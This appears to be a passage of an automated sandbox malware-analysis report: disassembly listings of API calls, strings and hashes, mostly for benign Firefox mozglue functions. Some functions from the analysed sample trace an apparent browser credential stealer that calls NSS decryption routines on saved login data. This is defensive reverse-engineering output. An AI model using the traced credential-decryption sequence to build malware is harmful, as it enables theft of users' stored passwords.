Part of subcall function 6BBDAAE0: GetCurrentThreadId.KERNEL32 ref: 6BBDAAF8
Part of subcall function 6BBDAAE0: EnterCriticalSection.KERNEL32(6BBFF770,?,6BB9BF9F), ref: 6BBDAB08
Part of subcall function 6BBDAAE0: LeaveCriticalSection.KERNEL32(6BBFF770,?,?,?,?,?,?,?,?,6BB9BF9F), ref: 6BBDAB6B

free.MOZGLUE(00000000), ref: 6BB9BFF0
_strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6BB9C014

Part of subcall function 6BBDAC20: CreateFileW.KERNEL32 ref: 6BBDAC52
Part of subcall function 6BBDAC20: CreateFileMappingW.KERNEL32 ref: 6BBDAC7D
Part of subcall function 6BBDAC20: GetSystemInfo.KERNEL32 ref: 6BBDAC98
Part of subcall function 6BBDAC20: MapViewOfFile.KERNEL32 ref: 6BBDACB0
Part of subcall function 6BBDAC20: GetSystemInfo.KERNEL32 ref: 6BBDACCD
Part of subcall function 6BBDAC20: MapViewOfFile.KERNEL32 ref: 6BBDAD05
Part of subcall function 6BBDAC20: UnmapViewOfFile.KERNEL32 ref: 6BBDAD1C
Part of subcall function 6BBDAC20: CloseHandle.KERNEL32 ref: 6BBDAD28
Part of subcall function 6BBDAC20: UnmapViewOfFile.KERNEL32 ref: 6BBDAD37
Part of subcall function 6BBDAC20: CloseHandle.KERNEL32 ref: 6BBDAD43

Part of subcall function 6BBDAE70: GetCurrentThreadId.KERNEL32 ref: 6BBDAE85
Part of subcall function 6BBDAE70: EnterCriticalSection.KERNEL32(6BBFF770,?,6BB9C034), ref: 6BBDAE96
Part of subcall function 6BBDAE70: LeaveCriticalSection.KERNEL32(6BBFF770,?,?,?,?,6BB9C034), ref: 6BBDAEBD

Strings

LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6BB9BDDD
LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6BB9BFCF
LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6BB9BF5B
accelerator.dll, xrefs: 6BB9BC8E, 6BB9BC9D

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
API String ID: 3889411031-3373514183
Opcode ID: e329a3fdb483f0ce375f15d9e35bf9e41058c33cefc3dc8feb84da872f145ea8
Instruction ID: 23f17428efdef73bc607932986672bfed239229d5621bda6e17e00d7a382360e
Opcode Fuzzy Hash: e329a3fdb483f0ce375f15d9e35bf9e41058c33cefc3dc8feb84da872f145ea8
Instruction Fuzzy Hash: 4EE1E9719043809FE720AF34E885B6EB7F9EF86714F00493DE99587280DB78E985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBE8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBB7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6BBBB9F1,?), ref: 6BBB7107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BBBDCF5), ref: 6BBBE92D
GetCurrentThreadId.KERNEL32 ref: 6BBBEA4F
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEA5C
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEA80
GetCurrentThreadId.KERNEL32 ref: 6BBBEA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BBBDCF5), ref: 6BBBEA92
GetCurrentThreadId.KERNEL32 ref: 6BBBEB11
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BBBEB3C
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEB5B

Part of subcall function 6BBB5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6BBBEB71), ref: 6BBB57AB

Part of subcall function 6BBACBE8: GetCurrentProcess.KERNEL32(?,6BB731A7), ref: 6BBACBF1
Part of subcall function 6BBACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BB731A7), ref: 6BBACBFA

Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BB84A68), ref: 6BBB945E
Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BBB9470
Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BBB9482
Part of subcall function 6BBB9420: __Init_thread_footer.LIBCMT ref: 6BBB949F

GetCurrentThreadId.KERNEL32 ref: 6BBBEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BBBEBAC

Part of subcall function 6BBB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BBB94EE
Part of subcall function 6BBB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BBB9508

GetCurrentThreadId.KERNEL32 ref: 6BBBEBC1
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8,?,?,00000000), ref: 6BBBEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BBBEBE5
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8,00000000), ref: 6BBBEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BBBEC46
CloseHandle.KERNEL32(?), ref: 6BBBEC55
free.MOZGLUE(00000000), ref: 6BBBEC5C

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BBBEA9B
[I %d/%d] profiler_start, xrefs: 6BBBEBB4

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: 4a90c74989cf8b25e300b5804f3530bdd70cbf42772ea8c5fe6347b079c7cd6b
Instruction ID: 101fa41c32a36bf59163e18ff9e1925a8de648ba0047996795f17332850e5537
Opcode Fuzzy Hash: 4a90c74989cf8b25e300b5804f3530bdd70cbf42772ea8c5fe6347b079c7cd6b
Instruction Fuzzy Hash: A5A13735A00684DFDB209F28E884B7E77AEFF86314F104469EA1987351DF7AD845CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6BB84180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6BB84196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BB841F1
VerSetConditionMask.NTDLL ref: 6BB84223
VerSetConditionMask.NTDLL ref: 6BB8422A
VerSetConditionMask.NTDLL ref: 6BB84231
VerSetConditionMask.NTDLL ref: 6BB84238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BB84245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BB84263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6BB8427A
FreeLibrary.KERNEL32(?), ref: 6BB84299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6BB842C4
VerSetConditionMask.NTDLL ref: 6BB842F6
VerSetConditionMask.NTDLL ref: 6BB84302
VerSetConditionMask.NTDLL ref: 6BB84309
VerSetConditionMask.NTDLL ref: 6BB84310
VerSetConditionMask.NTDLL ref: 6BB84317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6BB84324

Strings

Shcore.dll, xrefs: 6BB8425E
SetProcessDpiAwareness, xrefs: 6BB84274

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: f90945ea188ad1d4f2e5752c3d3897c3cb218386f47c77af3cbedaba1fa515e7
Instruction ID: e9b9a156aaf90816097b9fd4d68914d3890b8d64580c6895ab4beee02e6c7ea5
Opcode Fuzzy Hash: f90945ea188ad1d4f2e5752c3d3897c3cb218386f47c77af3cbedaba1fa515e7
Instruction Fuzzy Hash: FE51F171A44254ABEB106B74DC49FBEB7ACEF86B50F014568F9059B1C0DB79DD40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040C100 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0040C112

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,042F67A8,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
StrStrA.SHLWAPI(?,042F6838,0041D72E), ref: 0040C260
StrStrA.SHLWAPI(00000000,042F6B50), ref: 0040C287
StrStrA.SHLWAPI(?,042F7240,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,042F0858,00000000,?,0041DBB4,00000000,?), ref: 0040C405
StrStrA.SHLWAPI(00000000,042F73C0), ref: 0040C41C

Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,042F0958), ref: 0040BFE1
Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
Part of subcall function 0040BF90: PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
Part of subcall function 0040BF90: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
Part of subcall function 0040BF90: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
Part of subcall function 0040BF90: PK11_FreeSlot.NSS3(?), ref: 0040C0D1

StrStrA.SHLWAPI(?,042F73C0,00000000,?,0041DBBC,00000000,?,00000000,042F0958), ref: 0040C4BD
StrStrA.SHLWAPI(00000000,042F0818), ref: 0040C4D4

Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

lstrlen.KERNEL32(00000000), ref: 0040C5A7
CloseHandle.KERNEL32(00000000), ref: 0040C5F9
NSS_Shutdown.NSS3 ref: 0040C607

Strings

, xrefs: 0040C133

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
String ID:
API String ID: 2844179199-3916222277
Opcode ID: ef7cd0e1ef472e523f106152c5b9b463d5d6bb522bd6ea9a4f432336a72a88b3
Instruction ID: 16cc530deb27457f536659a64f134916331f5af867ee6c6bf2a367595298ef92
Opcode Fuzzy Hash: ef7cd0e1ef472e523f106152c5b9b463d5d6bb522bd6ea9a4f432336a72a88b3
Instruction Fuzzy Hash: 66E11075910208ABCB14EBA1DC91FEEBB79BF54304F41415EF10667191DF38AA86CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBFAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BBBFADC
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBFAE9
GetCurrentThreadId.KERNEL32 ref: 6BBBFB31
GetCurrentThreadId.KERNEL32 ref: 6BBBFB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BBBFBF6
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBFC50

Strings

[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6BBBFD15
[D %d/%d] profiler_unregister_thread: %s, xrefs: 6BBBFC94

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: 07869a3a2af1825ba763bbbaf8805ff6df9ae16c647f72af784964caea031c52
Instruction ID: 637269886f08747a6b1f92ea06d3db198c7c1f2d88803413f6afdb0b1fcd69f7
Opcode Fuzzy Hash: 07869a3a2af1825ba763bbbaf8805ff6df9ae16c647f72af784964caea031c52
Instruction Fuzzy Hash: 1171DD38904780CFD724DF28D445B7EB7E9FF86704F01446AE9458B352EB7AA845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BB73AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BBFE768,?,00003000,00000004), ref: 6BB73AC5
LeaveCriticalSection.KERNEL32(6BBFE768,?,00003000,00000004), ref: 6BB73AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6BB73AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6BB73B57
EnterCriticalSection.KERNEL32(6BBFE784), ref: 6BB73B81
LeaveCriticalSection.KERNEL32(6BBFE784), ref: 6BB73BA3
EnterCriticalSection.KERNEL32(6BBFE7B8), ref: 6BB73BAE
LeaveCriticalSection.KERNEL32(6BBFE7B8), ref: 6BB73C74
EnterCriticalSection.KERNEL32(6BBFE784), ref: 6BB73C8B
LeaveCriticalSection.KERNEL32(6BBFE784), ref: 6BB73C9F
LeaveCriticalSection.KERNEL32(6BBFE7B8), ref: 6BB73D5C
EnterCriticalSection.KERNEL32(6BBFE784), ref: 6BB73D67
LeaveCriticalSection.KERNEL32(6BBFE784), ref: 6BB73D8A

Part of subcall function 6BBB0D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6BB73DEF), ref: 6BBB0D71
Part of subcall function 6BBB0D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6BB73DEF), ref: 6BBB0D84

Strings

: (malloc) Error in VirtualFree(), xrefs: 6BB73DCC
<jemalloc>, xrefs: 6BB73DC7
MOZ_CRASH(), xrefs: 6BB73DB2

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: 8037b70ff4d27b5e5bf2dac322b602921f2a98ba11edd0d611c4c406f53d7a5e
Instruction ID: 2a25e4b2cc4a51f4dbf6225555b276c836c988b4b797bd3afc66eaaec730c69e
Opcode Fuzzy Hash: 8037b70ff4d27b5e5bf2dac322b602921f2a98ba11edd0d611c4c406f53d7a5e
Instruction Fuzzy Hash: C1918C71A042858BDF24EF78D8C5B3E77A6FB85310B244578E9219B285D77AE802CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BB811B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6BB81213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BB81285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6BB812B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6BB81327

Strings

Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6BB8120D
MZx, xrefs: 6BB811E1
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6BB812AD
CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6BB8131B
&, xrefs: 6BB8126B

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: 485f4731bb67496a32484f463c862ebca8fa300faf0ff9595b5e53812b3ae8c0
Instruction ID: 38c75c936364ddacc7d695c343f2eb2a4ed88a8dc9875574bbab6032843ae7c4
Opcode Fuzzy Hash: 485f4731bb67496a32484f463c862ebca8fa300faf0ff9595b5e53812b3ae8c0
Instruction Fuzzy Hash: 3D71B571D067A49BDB209F74C8017EEB7F5FF48349F08055ED559A3240D7386A89CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB731C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6BB73217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6BB73236
FreeLibrary.KERNEL32 ref: 6BB7324B
__Init_thread_footer.LIBCMT ref: 6BB73260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6BB7327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BB7328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BB732AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BB732D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6BB732E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6BB732F7

Part of subcall function 6BBAAB89: EnterCriticalSection.KERNEL32(6BBFE370,?,?,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284), ref: 6BBAAB94
Part of subcall function 6BBAAB89: LeaveCriticalSection.KERNEL32(6BBFE370,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284,?,?,6BB956F6), ref: 6BBAABD1

__aulldiv.LIBCMT ref: 6BB7346B

Strings

QueryInterruptTime, xrefs: 6BB73230
KernelBase.dll, xrefs: 6BB73212

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 66896513920138b996db6f7b539d9c7f0ec997fb406b614b018a9c8e6e05189b
Instruction ID: eb5c32e7919aa31e06d5e516f03f7b9a26fb50f5a9773949f387a0bd317f2375
Opcode Fuzzy Hash: 66896513920138b996db6f7b539d9c7f0ec997fb406b614b018a9c8e6e05189b
Instruction Fuzzy Hash: 47610271908B818BC725DF38D45162AB3E9FFC6350F218B2DE9A5A3290EB35D546CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAE0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 0040FB05
ExitProcess.KERNEL32 ref: 0040FB11
strtok_s.MSVCRT ref: 0040FB28

Strings

block, xrefs: 0040FAF7

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 52d09828bd6328d95c269d46c52906f376363bf45c2a71b165d5bab26f2389d9
Instruction ID: 7825bcbe27da9618b603611e1cfecd621835b499ad6dca7fa43ef563d7fd58f0
Opcode Fuzzy Hash: 52d09828bd6328d95c269d46c52906f376363bf45c2a71b165d5bab26f2389d9
Instruction Fuzzy Hash: 0F514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B76C0D778E985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411F30 Relevance: 19.7, APIs: 13, Instructions: 193stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411F4E
memset.MSVCRT ref: 00411F65

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00411F9C
lstrcat.KERNEL32(?,042F6CE8), ref: 00411FBB
lstrcat.KERNEL32(?,?), ref: 00411FCF
lstrcat.KERNEL32(?,042F6988), ref: 00411FE3

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,042F65E0), ref: 0040971B
Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
